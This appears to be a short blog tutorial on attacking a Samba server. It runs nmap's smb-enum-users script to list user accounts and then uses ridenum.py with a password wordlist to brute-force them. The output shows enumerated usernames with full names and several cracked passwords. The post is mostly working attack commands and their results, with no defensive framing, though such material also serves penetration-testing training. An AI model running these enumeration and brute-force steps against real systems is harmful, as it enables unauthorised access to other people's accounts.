Finding Samba users with NMAP
We can use nmap to enumerate samba user names on the remote host by using the nmap script 'smb-enum-users'.
root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124 Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT Nmap scan report for srv01.acme.com (48.21.33.124) Host is up (0.0027s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 137/udp open netbios-ns Host script results: | smb-enum-users: | ASUS\clare (RID: 1001) | Full name: clare chapman | Description: | Flags: Normal user account | ASUS\hayden (RID: 1002) | Full name: hayden sutton | Description: | Flags: Normal user account | ASUS\jared (RID: 1003) | Full name: jared beck | Description: | Flags: Normal user account | ASUS\sam (RID: 1000) | Full name: sam | Description: | Flags: Normal user account | ASUS\sasha (RID: 1004) | Full name: sasha kim | Description: | Flags: Normal user account | ASUS\vance (RID: 1005) | Full name: vance perkins | Description: |_ Flags: Normal user account Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds root@asus:~/unix%
Once we have our list of users on the Samba server we can move on to enumerating and brute forcing accounts. Our user list should look like so.
ASUS\clare ASUS\sam ASUS\sasha ASUS\vance ASUS\jared ASUS\hayden
Using ridenum.py to brute force Samba user accounts
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum.
root@asus:~/src/ridenum% ./ridenum.py 48.21.33.124 500 50000 /home/sam/rock.txt /home/sam/samba.txt [*] Successfully guessed username: ASUS\sasha with password of: master [*] Successfully guessed username: ASUS\vance with password of: sonics [*] Successfully guessed username: ASUS\jared with password of: attlabs [*] Successfully guessed username: ASUS\hayden with password of: manager [*] We got some accounts, exported results to 48.21.33.124_success_results_txt [*] All accounts extracted via RID cycling have been exported to 48.21.33.124_users.txt root@asus:~/src/ridenum%
No comments:
Post a Comment